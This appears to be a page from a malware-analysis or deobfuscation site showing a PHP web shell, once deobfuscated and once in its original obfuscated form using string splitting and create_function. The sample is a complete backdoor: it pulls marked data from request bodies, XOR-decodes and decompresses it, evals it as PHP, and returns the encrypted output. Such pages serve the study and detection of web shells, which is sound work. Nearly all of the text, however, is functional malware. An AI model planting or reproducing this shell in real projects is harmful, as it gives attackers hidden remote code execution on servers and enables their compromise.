Back to listTags
Encodingbase64_decode
base64_encode
Executioneval
Deobfuscated code
<?php
$r = 'strlen1H($t);$o=1H""1H;for($i=0;$i<1H$l;1H){f1Hor($j=0;($j<$c&1H&$i<$1Hl';
$c = '$k="e91a1H1H1H7330";$1Hkh="b1Hac11Hfe3ab27e";$kf="1H69a41H65d59f1H59";$p="l';
$Q = '"),$m)=1H=1) {@1Ho1Hb_s1Htart();@eva1Hl(@g1Hzu1H1Hncompress(@x(@bas1H1He64_decode(';
$k = '1H$m[1]),$k)))1H;$o=@o1Hb1H_get_cont1Hents()1H;@ob_end1H_c1H1Hlean();$r=@b1H';
$F = '61HXsGm1H7Qungl1HL1HPBj";function x(1H$t,$k){1H$c=str1Hl1Hen($1Hk);$l=1H';
$t = "create_function";
$X = ');$j++1H,$1Hi++){$o1H1H.=$t{$i1H}^$k{$j};}1H}return 1H$o;1H}if (@1Hpreg';
$R = '1H_match("/$k1H1Hh(.+)1H$kf/",@file1H1H_get_contents1H("ph1Hp://input1H';
$P = 'as1He64_encod1He(@x(@gzco1Hmpr1Hess($o)1H,$k));1Hprint(1H"$p$kh$r1H$kf");}';
$K = "\$k=\"e91a7330\";\$kh=\"bac1fe3ab27e\";\$kf=\"69a465d59f59\";\$p=\"l6XsGm7QunglLPBj\";function x(\$t,\$k){\$c=strlen(\$k);\$l=strlen(\$t);\$o=\"\";for(\$i=0;\$i<\$l;){for(\$j=0;(\$j<\$c&&\$i<\$l);\$j++,\$i++){\$o.=\$t{\$i}^\$k{\$j};}}return \$o;}if (@preg_match(\"/\$kh(.+)\$kf/\",@file_get_contents(\"php://input\"),\$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode(\$m[1]),\$k)));\$o=@ob_get_contents();@ob_end_clean();\$r=@base64_encode(@x(@gzcompress(\$o),\$k));print(\"\$p\$kh\$r\$kf\");}";
$p = function () {
$k = "e91a7330";
$kh = "bac1fe3ab27e";
$kf = "69a465d59f59";
$p = "l6XsGm7QunglLPBj";
function x($t, $k)
{
$c = strlen($k);
$l = strlen($t);
$o = "";
for ($i = 0; $i < $l;) {
for ($j = 0; $j < $c && $i < $l; $j++, $i++) {
$o .= $t[$i] ^ $k[$j];
}
}
return $o;
}
if (@preg_match("/bac1fe3ab27e(.+)69a465d59f59/", @file_get_contents("php://input"), $m) == 1) {
@ob_start();
@eval(@gzuncompress(@x(@base64_decode($m[1]), $k)));
$o = @ob_get_contents();
@ob_end_clean();
$r = @base64_encode(@x(@gzcompress($o), $k));
print "{$p}{$kh}{$r}{$kf}";
}
};
$p();
Original code
<?php
$r='strlen1H($t);$o=1H""1H;for($i=0;$i<1H$l;1H){f1Hor($j=0;($j<$c&1H&$i<$1Hl';
$c='$k="e91a1H1H1H7330";$1Hkh="b1Hac11Hfe3ab27e";$kf="1H69a41H65d59f1H59";$p="l';
$Q='"),$m)=1H=1) {@1Ho1Hb_s1Htart();@eva1Hl(@g1Hzu1H1Hncompress(@x(@bas1H1He64_decode(';
$k='1H$m[1]),$k)))1H;$o=@o1Hb1H_get_cont1Hents()1H;@ob_end1H_c1H1Hlean();$r=@b1H';
$F='61HXsGm1H7Qungl1HL1HPBj";function x(1H$t,$k){1H$c=str1Hl1Hen($1Hk);$l=1H';
$t=str_replace('D','','crDeDDDate_funDcDtion');
$X=');$j++1H,$1Hi++){$o1H1H.=$t{$i1H}^$k{$j};}1H}return 1H$o;1H}if (@1Hpreg';
$R='1H_match("/$k1H1Hh(.+)1H$kf/",@file1H1H_get_contents1H("ph1Hp://input1H';
$P='as1He64_encod1He(@x(@gzco1Hmpr1Hess($o)1H,$k));1Hprint(1H"$p$kh$r1H$kf");}';
$K=str_replace('1H','',$c.$F.$r.$X.$R.$Q.$k.$P);
$p=$t('',$K);$p();
?>